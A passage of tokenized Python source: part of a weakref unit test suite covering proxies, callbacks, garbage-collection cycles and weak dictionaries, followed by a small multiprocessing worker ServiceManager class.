proxy ( L3 ) <EOL> self . assertEqual ( L3 [ : ] , p3 [ : ] ) <EOL> self . assertEqual ( L3 [ <NUM_LIT:5> : ] , p3 [ <NUM_LIT:5> : ] ) <EOL> self . assertEqual ( L3 [ : <NUM_LIT:5> ] , p3 [ : <NUM_LIT:5> ] ) <EOL> self . assertEqual ( L3 [ <NUM_LIT:2> : <NUM_LIT:5> ] , p3 [ <NUM_LIT:2> : <NUM_LIT:5> ] ) <EOL> def test_shared_ref_without_callback ( self ) : <EOL> self . check_shared_without_callback ( weakref . ref ) <EOL> def test_shared_proxy_without_callback ( self ) : <EOL> self . check_shared_without_callback ( weakref . proxy ) <EOL> def check_shared_without_callback ( self , makeref ) : <EOL> o = Object ( <NUM_LIT:1> ) <EOL> p1 = makeref ( o , None ) <EOL> p2 = makeref ( o , None ) <EOL> self . assert_ ( p1 is p2 , "<STR_LIT>" ) <EOL> del p1 , p2 <EOL> p1 = makeref ( o ) <EOL> p2 = makeref ( o , None ) <EOL> self . assert_ ( p1 is p2 , "<STR_LIT>" ) <EOL> del p1 , p2 <EOL> p1 = makeref ( o ) <EOL> p2 = makeref ( o ) <EOL> self . assert_ ( p1 is p2 , "<STR_LIT>" ) <EOL> del p1 , p2 <EOL> p1 = makeref ( o , None ) <EOL> p2 = makeref ( o ) <EOL> self . assert_ ( p1 is p2 , "<STR_LIT>" ) <EOL> def test_callable_proxy ( self ) : <EOL> o = Callable ( ) <EOL> ref1 = weakref . proxy ( o ) <EOL> self . check_proxy ( o , ref1 ) <EOL> self . assert_ ( type ( ref1 ) is weakref . CallableProxyType , <EOL> "<STR_LIT>" ) <EOL> ref1 ( '<STR_LIT>' ) <EOL> self . assert_ ( o . bar == '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> ref1 ( x = '<STR_LIT>' ) <EOL> self . assert_ ( o . bar == '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> self . assertRaises ( TypeError , ref1 ) <EOL> self . assertRaises ( TypeError , ref1 , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> def check_proxy ( self , o , proxy ) : <EOL> o . foo = <NUM_LIT:1> <EOL> self . assert_ ( proxy . foo == <NUM_LIT:1> , <EOL> "<STR_LIT>" ) <EOL> o . foo = <NUM_LIT:2> <EOL> self . assert_ ( proxy . foo == <NUM_LIT:2> , <EOL> "<STR_LIT>" ) <EOL> del o . foo <EOL> self . assert_ ( not hasattr ( proxy , '<STR_LIT:foo>' ) , <EOL> "<STR_LIT>" ) <EOL> proxy . foo = <NUM_LIT:1> <EOL> self . assert_ ( o . foo == <NUM_LIT:1> , <EOL> "<STR_LIT>" ) <EOL> proxy . foo = <NUM_LIT:2> <EOL> self . assert_ ( <EOL> o . foo == <NUM_LIT:2> , <EOL> "<STR_LIT>" ) <EOL> del proxy . foo <EOL> self . assert_ ( not hasattr ( o , '<STR_LIT:foo>' ) , <EOL> "<STR_LIT>" ) <EOL> def test_proxy_deletion ( self ) : <EOL> class Foo : <EOL> result = None <EOL> def __delitem__ ( self , accessor ) : <EOL> self . result = accessor <EOL> g = Foo ( ) <EOL> f = weakref . proxy ( g ) <EOL> del f [ <NUM_LIT:0> ] <EOL> self . assertEqual ( f . result , <NUM_LIT:0> ) <EOL> def test_proxy_bool ( self ) : <EOL> class List ( list ) : pass <EOL> lyst = List ( ) <EOL> self . assertEqual ( bool ( weakref . proxy ( lyst ) ) , bool ( lyst ) ) <EOL> def test_getweakrefcount ( self ) : <EOL> o = C ( ) <EOL> ref1 = weakref . ref ( o ) <EOL> ref2 = weakref . ref ( o , self . callback ) <EOL> self . assert_ ( weakref . getweakrefcount ( o ) == <NUM_LIT:2> , <EOL> "<STR_LIT>" ) <EOL> proxy1 = weakref . proxy ( o ) <EOL> proxy2 = weakref . proxy ( o , self . callback ) <EOL> self . assert_ ( weakref . getweakrefcount ( o ) == <NUM_LIT:4> , <EOL> "<STR_LIT>" ) <EOL> del ref1 , ref2 , proxy1 , proxy2 <EOL> extra_collect ( ) <EOL> self . assert_ ( weakref . getweakrefcount ( o ) == <NUM_LIT:0> , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assert_ ( weakref . getweakrefcount ( <NUM_LIT:1> ) == <NUM_LIT:0> , <EOL> "<STR_LIT>" ) <EOL> def test_getweakrefs ( self ) : <EOL> o = C ( ) <EOL> ref1 = weakref . ref ( o , self . callback ) <EOL> ref2 = weakref . ref ( o , self . callback ) <EOL> del ref1 <EOL> extra_collect ( ) <EOL> self . assert_ ( weakref . getweakrefs ( o ) == [ ref2 ] , <EOL> "<STR_LIT>" ) <EOL> o = C ( ) <EOL> ref1 = weakref . ref ( o , self . callback ) <EOL> ref2 = weakref . ref ( o , self . callback ) <EOL> del ref2 <EOL> extra_collect ( ) <EOL> self . assert_ ( weakref . getweakrefs ( o ) == [ ref1 ] , <EOL> "<STR_LIT>" ) <EOL> del ref1 <EOL> extra_collect ( ) <EOL> self . assert_ ( weakref . getweakrefs ( o ) == [ ] , <EOL> "<STR_LIT>" ) <EOL> self . assert_ ( weakref . getweakrefs ( <NUM_LIT:1> ) == [ ] , <EOL> "<STR_LIT>" ) <EOL> def test_newstyle_number_ops ( self ) : <EOL> class F ( float ) : <EOL> pass <EOL> f = F ( <NUM_LIT> ) <EOL> p = weakref . proxy ( f ) <EOL> self . assert_ ( p + <NUM_LIT:1.0> == <NUM_LIT> ) <EOL> self . assert_ ( <NUM_LIT:1.0> + p == <NUM_LIT> ) <EOL> def test_callbacks_protected ( self ) : <EOL> class BogusError ( Exception ) : <EOL> pass <EOL> data = { } <EOL> def remove ( k ) : <EOL> del data [ k ] <EOL> def encapsulate ( ) : <EOL> f = lambda : ( ) <EOL> data [ weakref . ref ( f , remove ) ] = None <EOL> raise BogusError <EOL> try : <EOL> encapsulate ( ) <EOL> except BogusError : <EOL> pass <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> try : <EOL> encapsulate ( ) <EOL> except BogusError : <EOL> pass <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> def test_sf_bug_840829 ( self ) : <EOL> import gc <EOL> class C ( object ) : <EOL> pass <EOL> c = C ( ) <EOL> wr = weakref . ref ( c , lambda ignore : gc . collect ( ) ) <EOL> del c <EOL> del wr <EOL> c1 = C ( ) <EOL> c1 . i = C ( ) <EOL> wr = weakref . ref ( c1 . i , lambda ignore : gc . collect ( ) ) <EOL> c2 = C ( ) <EOL> c2 . c1 = c1 <EOL> del c1 <EOL> del c2 <EOL> def test_callback_in_cycle_1 ( self ) : <EOL> import gc <EOL> class J ( object ) : <EOL> pass <EOL> class II ( object ) : <EOL> def acallback ( self , ignore ) : <EOL> self . J <EOL> I = II ( ) <EOL> I . J = J <EOL> I . wr = weakref . ref ( J , I . acallback ) <EOL> del I , J , II <EOL> gc . collect ( ) <EOL> def test_callback_in_cycle_2 ( self ) : <EOL> import gc <EOL> class J ( object ) : <EOL> pass <EOL> class II : <EOL> def acallback ( self , ignore ) : <EOL> self . J <EOL> I = II ( ) <EOL> I . J = J <EOL> I . wr = weakref . ref ( J , I . acallback ) <EOL> del I , J , II <EOL> gc . collect ( ) <EOL> def test_callback_in_cycle_3 ( self ) : <EOL> import gc <EOL> class C : <EOL> def cb ( self , ignore ) : <EOL> self . me <EOL> self . c1 <EOL> self . wr <EOL> c1 , c2 = C ( ) , C ( ) <EOL> c2 . me = c2 <EOL> c2 . c1 = c1 <EOL> c2 . wr = weakref . ref ( c1 , c2 . cb ) <EOL> del c1 , c2 <EOL> gc . collect ( ) <EOL> def test_callback_in_cycle_4 ( self ) : <EOL> import gc <EOL> class C ( object ) : <EOL> def cb ( self , ignore ) : <EOL> self . me <EOL> self . c1 <EOL> self . wr <EOL> class D : <EOL> pass <EOL> c1 , c2 = D ( ) , C ( ) <EOL> c2 . me = c2 <EOL> c2 . c1 = c1 <EOL> c2 . wr = weakref . ref ( c1 , c2 . cb ) <EOL> del c1 , c2 , C , D <EOL> gc . collect ( ) <EOL> def test_callback_in_cycle_resurrection ( self ) : <EOL> import gc <EOL> alist = [ ] <EOL> class C ( object ) : <EOL> def __init__ ( self , value ) : <EOL> self . attribute = value <EOL> def acallback ( self , ignore ) : <EOL> alist . append ( self . c ) <EOL> c1 , c2 = C ( <NUM_LIT:1> ) , C ( <NUM_LIT:2> ) <EOL> c1 . c = c2 <EOL> c2 . c = c1 <EOL> c1 . wr = weakref . ref ( c2 , c1 . acallback ) <EOL> c2 . wr = weakref . ref ( c1 , c2 . acallback ) <EOL> def C_went_away ( ignore ) : <EOL> alist . append ( "<STR_LIT>" ) <EOL> wr = weakref . ref ( C , C_went_away ) <EOL> del c1 , c2 , C <EOL> self . assertEqual ( alist , [ ] ) <EOL> gc . collect ( ) <EOL> self . assertEqual ( alist , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( wr ( ) , None ) <EOL> del alist [ : ] <EOL> gc . collect ( ) <EOL> self . assertEqual ( alist , [ ] ) <EOL> def test_callbacks_on_callback ( self ) : <EOL> import gc <EOL> alist = [ ] <EOL> def safe_callback ( ignore ) : <EOL> alist . append ( "<STR_LIT>" ) <EOL> class C ( object ) : <EOL> def cb ( self , ignore ) : <EOL> alist . append ( "<STR_LIT>" ) <EOL> c , d = C ( ) , C ( ) <EOL> c . other = d <EOL> d . other = c <EOL> callback = c . cb <EOL> c . wr = weakref . ref ( d , callback ) <EOL> d . wr = weakref . ref ( callback , d . cb ) <EOL> external_wr = weakref . ref ( callback , safe_callback ) <EOL> self . assert_ ( external_wr ( ) is callback ) <EOL> del callback , c , d , C <EOL> self . assertEqual ( alist , [ ] ) <EOL> gc . collect ( ) <EOL> extra_collect ( ) <EOL> self . assertEqual ( alist , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( external_wr ( ) , None ) <EOL> del alist [ : ] <EOL> gc . collect ( ) <EOL> self . assertEqual ( alist , [ ] ) <EOL> def test_gc_during_ref_creation ( self ) : <EOL> self . check_gc_during_creation ( weakref . ref ) <EOL> def test_gc_during_proxy_creation ( self ) : <EOL> self . check_gc_during_creation ( weakref . proxy ) <EOL> def check_gc_during_creation ( self , makeref ) : <EOL> if not test_support . is_jython : <EOL> thresholds = gc . get_threshold ( ) <EOL> gc . set_threshold ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> gc . collect ( ) <EOL> class A : <EOL> pass <EOL> def callback ( * args ) : <EOL> pass <EOL> referenced = A ( ) <EOL> a = A ( ) <EOL> a . a = a <EOL> a . wr = makeref ( referenced ) <EOL> try : <EOL> a = A ( ) <EOL> weakref . ref ( referenced , callback ) <EOL> finally : <EOL> if not test_support . is_jython : <EOL> gc . set_threshold ( * thresholds ) <EOL> def test_ref_created_during_del ( self ) : <EOL> class Target ( object ) : <EOL> def __del__ ( self ) : <EOL> global ref_from_del <EOL> ref_from_del = weakref . ref ( self ) <EOL> w = Target ( ) <EOL> class SubclassableWeakrefTestCase ( unittest . TestCase ) : <EOL> def test_subclass_refs ( self ) : <EOL> class MyRef ( weakref . ref ) : <EOL> def __init__ ( self , ob , callback = None , value = <NUM_LIT> ) : <EOL> self . value = value <EOL> super ( MyRef , self ) . __init__ ( ob , callback ) <EOL> def __call__ ( self ) : <EOL> self . called = True <EOL> return super ( MyRef , self ) . __call__ ( ) <EOL> o = Object ( "<STR_LIT:foo>" ) <EOL> mr = MyRef ( o , value = <NUM_LIT> ) <EOL> self . assert_ ( mr ( ) is o ) <EOL> self . assert_ ( mr . called ) <EOL> self . assertEqual ( mr . value , <NUM_LIT> ) <EOL> del o <EOL> self . assert_ ( mr ( ) is None ) <EOL> self . assert_ ( mr . called ) <EOL> def test_subclass_refs_dont_replace_standard_refs ( self ) : <EOL> class MyRef ( weakref . ref ) : <EOL> pass <EOL> o = Object ( <NUM_LIT> ) <EOL> r1 = MyRef ( o ) <EOL> r2 = weakref . ref ( o ) <EOL> self . assert_ ( r1 is not r2 ) <EOL> self . assertEqual ( weakref . getweakrefs ( o ) , [ r2 , r1 ] ) <EOL> self . assertEqual ( weakref . getweakrefcount ( o ) , <NUM_LIT:2> ) <EOL> r3 = MyRef ( o ) <EOL> self . assertEqual ( weakref . getweakrefcount ( o ) , <NUM_LIT:3> ) <EOL> refs = weakref . getweakrefs ( o ) <EOL> self . assertEqual ( len ( refs ) , <NUM_LIT:3> ) <EOL> self . assert_ ( r2 is refs [ <NUM_LIT:0> ] ) <EOL> self . assert_ ( r1 in refs [ <NUM_LIT:1> : ] ) <EOL> self . assert_ ( r3 in refs [ <NUM_LIT:1> : ] ) <EOL> def test_subclass_refs_dont_conflate_callbacks ( self ) : <EOL> class MyRef ( weakref . ref ) : <EOL> pass <EOL> o = Object ( <NUM_LIT> ) <EOL> r1 = MyRef ( o , id ) <EOL> r2 = MyRef ( o , str ) <EOL> self . assert_ ( r1 is not r2 ) <EOL> refs = weakref . getweakrefs ( o ) <EOL> self . assert_ ( r1 in refs ) <EOL> self . assert_ ( r2 in refs ) <EOL> def test_subclass_refs_with_slots ( self ) : <EOL> class MyRef ( weakref . ref ) : <EOL> __slots__ = "<STR_LIT>" , "<STR_LIT>" <EOL> def __new__ ( type , ob , callback , slot1 , slot2 ) : <EOL> return weakref . ref . __new__ ( type , ob , callback ) <EOL> def __init__ ( self , ob , callback , slot1 , slot2 ) : <EOL> self . slot1 = slot1 <EOL> self . slot2 = slot2 <EOL> def meth ( self ) : <EOL> return self . slot1 + self . slot2 <EOL> o = Object ( <NUM_LIT> ) <EOL> r = MyRef ( o , None , "<STR_LIT:abc>" , "<STR_LIT>" ) <EOL> self . assertEqual ( r . slot1 , "<STR_LIT:abc>" ) <EOL> self . assertEqual ( r . slot2 , "<STR_LIT>" ) <EOL> self . assertEqual ( r . meth ( ) , "<STR_LIT>" ) <EOL> self . failIf ( hasattr ( r , "<STR_LIT>" ) ) <EOL> class Object : <EOL> def __init__ ( self , arg ) : <EOL> self . arg = arg <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . arg <EOL> class MappingTestCase ( TestBase ) : <EOL> COUNT = <NUM_LIT:10> <EOL> def test_weak_values ( self ) : <EOL> dict , objects = self . make_weak_valued_dict ( ) <EOL> for o in objects : <EOL> self . assert_ ( weakref . getweakrefcount ( o ) == <NUM_LIT:1> , <EOL> "<STR_LIT>" % o ) <EOL> self . assert_ ( o is dict [ o . arg ] , <EOL> "<STR_LIT>" ) <EOL> items1 = dict . items ( ) <EOL> items2 = dict . copy ( ) . items ( ) <EOL> items1 . sort ( ) <EOL> items2 . sort ( ) <EOL> self . assert_ ( items1 == items2 , <EOL> "<STR_LIT>" ) <EOL> del items1 , items2 <EOL> self . assert_ ( len ( dict ) == self . COUNT ) <EOL> del objects [ <NUM_LIT:0> ] <EOL> extra_collect ( ) <EOL> self . assert_ ( len ( dict ) == ( self . COUNT - <NUM_LIT:1> ) , <EOL> "<STR_LIT>" ) <EOL> del objects , o <EOL> extra_collect ( ) <EOL> self . assert_ ( len ( dict ) == <NUM_LIT:0> , <EOL> "<STR_LIT>" ) <EOL> dict = weakref . WeakValueDictionary ( ) <EOL> self . assertRaises ( KeyError , dict . __getitem__ , <NUM_LIT:1> ) <EOL> dict [ <NUM_LIT:2> ] = C ( ) <EOL> extra_collect ( ) <EOL> self . assertRaises ( KeyError , dict . __getitem__ , <NUM_LIT:2> ) <EOL> def test_weak_keys ( self ) : <EOL> dict , objects = self . make_weak_keyed_dict ( ) <EOL> for o in objects : <EOL> self . assert_ ( weakref . getweakrefcount ( o ) == <NUM_LIT:1> , <EOL> "<STR_LIT>" % o ) <EOL> self . assert_ ( o . arg is dict [ o ] , <EOL> "<STR_LIT>" ) <EOL> items1 = dict . items ( ) <EOL> items2 = dict . copy ( ) . items ( ) <EOL> self . assert_ ( set ( items1 ) == set ( items2 ) , <EOL> "<STR_LIT>" ) <EOL> del items1 , items2 <EOL> self . assert_ ( len ( dict ) == self . COUNT ) <EOL> del objects [ <NUM_LIT:0> ] <EOL> extra_collect ( ) <EOL> self . assert_ ( len ( dict ) == ( self . COUNT - <NUM_LIT:1> ) , <EOL> "<STR_LIT>" ) <EOL> del objects , o <EOL> extra_collect ( ) <EOL> self . assert_ ( len ( dict ) == <NUM_LIT:0> , <EOL> "<STR_LIT>" ) <EOL> o = Object ( <NUM_LIT> ) <EOL> dict [ o ] = "<STR_LIT>" <EOL> self . assert_ ( dict . has_key ( o ) ) <EOL> self . assert_ ( not dict . has_key ( <NUM_LIT> ) ) <EOL> def test_weak_keyed_iters ( self ) : <EOL> dict , objects = self . make_weak_keyed_dict ( ) <EOL> self . check_iters ( dict ) <EOL> refs = dict . keyrefs ( ) <EOL> self . assertEqual ( len ( refs ) , len ( objects ) ) <EOL> objects2 = list ( objects ) <EOL> for wr in refs : <EOL> ob = wr ( ) <EOL> self . assert_ ( dict . has_key ( ob ) ) <EOL> self . assert_ ( ob in dict ) <EOL> self . assertEqual ( ob . arg , dict [ ob ] ) <EOL> objects2 . remove ( ob ) <EOL> self . assertEqual ( len ( objects2 ) , <NUM_LIT:0> ) <EOL> objects2 = list ( objects ) <EOL> self . assertEqual ( len ( list ( dict . iterkeyrefs ( ) ) ) , len ( objects ) ) <EOL> for wr in dict . iterkeyrefs ( ) : <EOL> ob = wr ( ) <EOL> self . assert_ ( dict . has_key ( ob ) ) <EOL> self . assert_ ( ob in dict ) <EOL> self . assertEqual ( ob . arg , dict [ ob ] ) <EOL> objects2 . remove ( ob ) <EOL> self . assertEqual ( len ( objects2 ) , <NUM_LIT:0> ) <EOL> def test_weak_valued_iters ( self ) : <EOL> dict , objects = self . make_weak_valued_dict ( ) <EOL> self . check_iters ( dict ) <EOL> refs = dict . valuerefs ( ) <EOL> self . assertEqual ( len ( refs ) , len ( objects ) ) <EOL> objects2 = list ( objects ) <EOL> for wr in refs : <EOL> ob = wr ( ) <EOL> self . assertEqual ( ob , dict [ ob . arg ] ) <EOL> self . assertEqual ( ob . arg , dict [ ob . arg ] . arg ) <EOL> objects2 . remove ( ob ) <EOL> self . assertEqual ( len ( objects2 ) , <NUM_LIT:0> ) <EOL> objects2 = list ( objects ) <EOL> self . assertEqual ( len ( list ( dict . itervaluerefs ( ) ) ) , len ( objects ) ) <EOL> for wr in dict . itervaluerefs ( ) : <EOL> ob = wr ( ) <EOL> self . assertEqual ( ob , dict [ ob . arg ] ) <EOL> self . assertEqual ( ob . arg , dict [ ob . arg ] . arg ) <EOL> objects2 . remove ( ob ) <EOL> self . assertEqual ( len ( objects2 ) , <NUM_LIT:0> ) <EOL> def check_iters ( self , dict ) : <EOL> items = dict . items ( ) <EOL> for item in dict . iteritems ( ) : <EOL> items . remove ( item ) <EOL> self . assert_ ( len ( items ) == <NUM_LIT:0> , "<STR_LIT>" ) <EOL> keys = dict . keys ( ) <EOL> for k in dict : <EOL> keys . remove ( k ) <EOL> self . assert_ ( len ( keys ) == <NUM_LIT:0> , "<STR_LIT>" ) <EOL> keys = dict . keys ( ) <EOL> for k in dict . iterkeys ( ) : <EOL> keys . remove ( k ) <EOL> self . assert_ ( len ( keys ) == <NUM_LIT:0> , "<STR_LIT>" ) <EOL> values = dict . values ( ) <EOL> for v in dict . itervalues ( ) : <EOL> values . remove ( v ) <EOL> self . assert_ ( len ( values ) == <NUM_LIT:0> , <EOL> "<STR_LIT>" ) <EOL> def test_make_weak_keyed_dict_from_dict ( self ) : <EOL> o = Object ( <NUM_LIT:3> ) <EOL> dict = weakref . WeakKeyDictionary ( { o : <NUM_LIT> } ) <EOL> self . assert_ ( dict [ o ] == <NUM_LIT> ) <EOL> def test_make_weak_keyed_dict_from_weak_keyed_dict ( self ) : <EOL> o = Object ( <NUM_LIT:3> ) <EOL> dict = weakref . WeakKeyDictionary ( { o : <NUM_LIT> } ) <EOL> dict2 = weakref . WeakKeyDictionary ( dict ) <EOL> self . assert_ ( dict [ o ] == <NUM_LIT> ) <EOL> def make_weak_keyed_dict ( self ) : <EOL> dict = weakref . WeakKeyDictionary ( ) <EOL> objects = map ( Object , range ( self . COUNT ) ) <EOL> for o in objects : <EOL> dict [ o ] = o . arg <EOL> return dict , objects <EOL> def make_weak_valued_dict ( self ) : <EOL> dict = weakref . WeakValueDictionary ( ) <EOL> objects = map ( Object , range ( self . COUNT ) ) <EOL> for o in objects : <EOL> dict [ o . arg ] = o <EOL> return dict , objects <EOL> def check_popitem ( self , klass , key1 , value1 , key2 , value2 ) : <EOL> weakdict = klass ( ) <EOL> weakdict [ key1 ] = value1 <EOL> weakdict [ key2 ] = value2 <EOL> self . assert_ ( len ( weakdict ) == <NUM_LIT:2> ) <EOL> k , v = weakdict . popitem ( ) <EOL> self . assert_ ( len ( weakdict ) == <NUM_LIT:1> ) <EOL> if k is key1 : <EOL> self . assert_ ( v is value1 ) <EOL> else : <EOL> self . assert_ ( v is value2 ) <EOL> k , v = weakdict . popitem ( ) <EOL> self . assert_ ( len ( weakdict ) == <NUM_LIT:0> ) <EOL> if k is key1 : <EOL> self . assert_ ( v is value1 ) <EOL> else : <EOL> self . assert_ ( v is value2 ) <EOL> def test_weak_valued_dict_popitem ( self ) : <EOL> self . check_popitem ( weakref . WeakValueDictionary , <EOL> "<STR_LIT>" , C ( ) , "<STR_LIT>" , C ( ) ) <EOL> def test_weak_keyed_dict_popitem ( self ) : <EOL> self . check_popitem ( weakref . WeakKeyDictionary , <EOL> C ( ) , "<STR_LIT>" , C ( ) , "<STR_LIT>" ) <EOL> def check_setdefault ( self , klass , key , value1 , value2 ) : <EOL> self . assert_ ( value1 is not value2 , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> weakdict = klass ( ) <EOL> o = weakdict . setdefault ( key , value1 ) <EOL> self . assert_ ( o is value1 ) <EOL> self . assert_ ( weakdict . has_key ( key ) ) <EOL> self . assert_ ( weakdict . get ( key ) is value1 ) <EOL> self . assert_ ( weakdict [ key ] is value1 ) <EOL> o = weakdict . setdefault ( key , value2 ) <EOL> self . assert_ ( o is value1 ) <EOL> self . assert_ ( weakdict . has_key ( key ) ) <EOL> self . assert_ ( weakdict . get ( key ) is value1 ) <EOL> self . assert_ ( weakdict [ key ] is value1 ) <EOL> def test_weak_valued_dict_setdefault ( self ) : <EOL> self . check_setdefault ( weakref . WeakValueDictionary , <EOL> "<STR_LIT:key>" , C ( ) , C ( ) ) <EOL> def test_weak_keyed_dict_setdefault ( self ) : <EOL> self . check_setdefault ( weakref . WeakKeyDictionary , <EOL> C ( ) , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def check_update ( self , klass , dict ) : <EOL> weakdict = klass ( ) <EOL> weakdict . update ( dict ) <EOL> self . assert_ ( len ( weakdict ) == len ( dict ) ) <EOL> for k in weakdict . keys ( ) : <EOL> self . assert_ ( dict . has_key ( k ) , <EOL> "<STR_LIT>" ) <EOL> v = dict . get ( k ) <EOL> self . assert_ ( v is weakdict [ k ] ) <EOL> self . assert_ ( v is weakdict . get ( k ) ) <EOL> for k in dict . keys ( ) : <EOL> self . assert_ ( weakdict . has_key ( k ) , <EOL> "<STR_LIT>" ) <EOL> v = dict [ k ] <EOL> self . assert_ ( v is weakdict [ k ] ) <EOL> self . assert_ ( v is weakdict . get ( k ) ) <EOL> def test_weak_valued_dict_update ( self ) : <EOL> self . check_update ( weakref . WeakValueDictionary , <EOL> { <NUM_LIT:1> : C ( ) , '<STR_LIT:a>' : C ( ) , C ( ) : C ( ) } ) <EOL> def test_weak_keyed_dict_update ( self ) : <EOL> self . check_update ( weakref . WeakKeyDictionary , <EOL> { C ( ) : <NUM_LIT:1> , C ( ) : <NUM_LIT:2> , C ( ) : <NUM_LIT:3> } ) <EOL> def test_weak_keyed_delitem ( self ) : <EOL> d = weakref . WeakKeyDictionary ( ) <EOL> o1 = Object ( '<STR_LIT:1>' ) <EOL> o2 = Object ( '<STR_LIT:2>' ) <EOL> d [ o1 ] = '<STR_LIT>' <EOL> d [ o2 ] = '<STR_LIT>' <EOL> self . assert_ ( len ( d ) == <NUM_LIT:2> ) <EOL> del d [ o1 ] <EOL> self . assert_ ( len ( d ) == <NUM_LIT:1> ) <EOL> self . assert_ ( d . keys ( ) == [ o2 ] ) <EOL> def test_weak_valued_delitem ( self ) : <EOL> d = weakref . WeakValueDictionary ( ) <EOL> o1 = Object ( '<STR_LIT:1>' ) <EOL> o2 = Object ( '<STR_LIT:2>' ) <EOL> d [ '<STR_LIT>' ] = o1 <EOL> d [ '<STR_LIT>' ] = o2 <EOL> self . assert_ ( len ( d ) == <NUM_LIT:2> ) <EOL> del d [ '<STR_LIT>' ] <EOL> self . assert_ ( len ( d ) == <NUM_LIT:1> ) <EOL> self . assert_ ( d . items ( ) == [ ( '<STR_LIT>' , o2 ) ] ) <EOL> def test_weak_keyed_bad_delitem ( self ) : <EOL> d = weakref . WeakKeyDictionary ( ) <EOL> o = Object ( '<STR_LIT:1>' ) <EOL> self . assertRaises ( KeyError , d . __delitem__ , o ) <EOL> self . assertRaises ( KeyError , d . __getitem__ , o ) <EOL> self . assertRaises ( TypeError , d . __delitem__ , <NUM_LIT> ) <EOL> self . assertRaises ( TypeError , d . __getitem__ , <NUM_LIT> ) <EOL> self . assertRaises ( TypeError , d . __setitem__ , <NUM_LIT> , <NUM_LIT> ) <EOL> def test_weak_keyed_cascading_deletes ( self ) : <EOL> d = weakref . WeakKeyDictionary ( ) <EOL> mutate = False <EOL> class C ( object ) : <EOL> def __init__ ( self , i ) : <EOL> self . value = i <EOL> def __hash__ ( self ) : <EOL> return hash ( self . value ) <EOL> def __eq__ ( self , other ) : <EOL> if mutate : <EOL> del objs [ - <NUM_LIT:1> ] <EOL> return self . value == other . value <EOL> objs = [ C ( i ) for i in range ( <NUM_LIT:4> ) ] <EOL> for o in objs : <EOL> d [ o ] = o . value <EOL> del o <EOL> objs = d . keys ( ) <EOL> objs . reverse ( ) <EOL> mutate = True <EOL> count = <NUM_LIT:0> <EOL> for o in objs : <EOL> count += <NUM_LIT:1> <EOL> del d [ o ] <EOL> self . assertEqual ( len ( d ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( count , <NUM_LIT:2> ) <EOL> from test import mapping_tests <EOL> class WeakValueDictionaryTestCase ( mapping_tests . BasicTestMappingProtocol ) : <EOL> """<STR_LIT>""" <EOL> __ref = { "<STR_LIT>" : Object ( <NUM_LIT:1> ) , "<STR_LIT>" : Object ( <NUM_LIT:2> ) , "<STR_LIT>" : Object ( <NUM_LIT:3> ) } <EOL> type2test = weakref . WeakValueDictionary <EOL> def _reference ( self ) : <EOL> return self . __ref . copy ( ) <EOL> class WeakKeyDictionaryTestCase ( mapping_tests . BasicTestMappingProtocol ) : <EOL> """<STR_LIT>""" <EOL> __ref = { Object ( "<STR_LIT>" ) : <NUM_LIT:1> , Object ( "<STR_LIT>" ) : <NUM_LIT:2> , Object ( "<STR_LIT>" ) : <NUM_LIT:3> } <EOL> type2test = weakref . WeakKeyDictionary <EOL> def _reference ( self ) : <EOL> return self . __ref . copy ( ) <EOL> libreftest = """<STR_LIT>""" <EOL> __test__ = { '<STR_LIT>' : libreftest } <EOL> def test_main ( ) : <EOL> if test_support . is_jython : <EOL> del ReferencesTestCase . test_callback_in_cycle_resurrection <EOL> del ReferencesTestCase . test_callbacks_on_callback <EOL> del MappingTestCase . test_weak_keyed_bad_delitem <EOL> del MappingTestCase . test_weak_keyed_cascading_deletes <EOL> test_support . run_unittest ( <EOL> ReferencesTestCase , <EOL> MappingTestCase , <EOL> WeakValueDictionaryTestCase , <EOL> WeakKeyDictionaryTestCase , <EOL> ) <EOL> test_support . run_doctest ( sys . modules [ __name__ ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test_main ( ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import signal <EOL> import time <EOL> import sys <EOL> import multiprocessing <EOL> import inspect <EOL> import traceback <EOL> import logging <EOL> LOGGER = logging . getLogger ( __name__ ) <EOL> class ServiceManager ( object ) : <EOL> def __init__ ( self , worker_cls , num_workers = <NUM_LIT:2> ) : <EOL> if not ( inspect . isclass ( worker_cls ) and issubclass ( worker_cls , multiprocessing . Process ) ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . workers = [ ] <EOL> self . num_workers = num_workers <EOL> self . worker_cls = worker_cls <EOL> self . running = False <EOL> signal . signal ( signal . SIGINT , self . stop ) <EOL> signal . signal ( signal . SIGTERM , self . stop ) <EOL> def start ( self , * args , ** kwargs ) : <EOL> self . running = True <EOL> LOGGER . info ( "<STR_LIT>" ) <EOL> try : <EOL> while self . running : <EOL> if len ( self . workers ) < self . num_workers : <EOL> worker = self . worker_cls ( * args , ** kwargs ) <EOL> worker . start ( ) <EOL> self . workers . append ( worker ) <EOL> else : <EOL> for worker in self . workers : <EOL> if not worker . is_alive ( ) : <EOL> worker . shutdown ( ) <EOL> self . workers . remove ( worker ) <EOL> worker . terminate ( ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> except KeyboardInterrupt : <EOL> self . stop ( ) <EOL> except Exception as e : <EOL> LOGGER . exception ( str ( e ) ) <EOL> traceback . print_exc ( file = sys . stdout ) <EOL> self . stop ( ) <EOL> def stop ( self , signum = None , frame = None ) : <EOL> self . running = False <EOL> LOGGER . info ( "<STR_LIT>" ) <EOL> for worker in self . workers : <EOL> LOGGER . info ( "<STR_LIT>" + worker . name ) <EOL> worker . shutdown ( ) <EOL> worker . terminate ( ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> def is_running ( self ) : <EOL> return self . running </s>
